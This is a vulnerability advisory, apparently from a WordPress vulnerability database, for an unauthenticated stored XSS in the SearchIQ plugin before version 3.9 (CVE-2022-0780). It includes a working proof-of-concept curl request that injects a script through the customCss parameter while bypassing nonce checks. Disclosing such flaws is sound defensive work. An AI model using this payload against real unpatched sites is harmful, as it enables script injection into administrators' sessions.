SearchIQ < 3.9 – Unauthenticated Stored XSS | CVE 2022-0780 | Plugin Vulnerabilities

Description

The plugin contains a flag to disable the verification of CSRF nonces, granting unauthenticated attackers access to the siq_ajax AJAX action and allowing them to perform Cross-Site Scripting attacks due to the lack of sanitisation and escaping in the customCss parameter

Proof of Concept

Once the plugin is configured with an API key (can be a dummy one such as 123):

curl https://example.com/wp-admin/admin-ajax.php --data "action=siq_ajax&customCss=</textarea><script>alert('xss')</script>&nononce=1&task=set_custom_style"

The XSS will be triggered when an admin open the Options tab of the plugin (/wp-admin/admin.php?page=dwsearch&tab=tab-2)

Affects Plugins

Fixed in 3.9

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

0ee7d1a8-9782-4db5-b055-e732f2763825

Timeline

Publicly Published

2022-03-28 (about 2 years ago)

Added

2022-03-28 (about 2 years ago)

Last Updated

2022-04-11 (about 2 years ago)

Other

Published

Title

Published

2014-08-01

Title

ReFlex Gallery 1.4.2 - Unspecified XSS

Published

2023-08-16

Title

Query Wrangler < 1.5.52 - Reflected XSS

Published

2020-07-15

Title

Golo < 1.3.3 - Unauthenticated Reflected XSS

Published

2017-04-24

Title

Answer My Question 1.3 - Cross-Site Scripting (XSS)

Published

2024-04-05

Title

Easy Login Styler – White Label Admin Login Page for WordPress <= 1.0.6 - Authenticated (Administrator+) Stored Cross-Site Scripting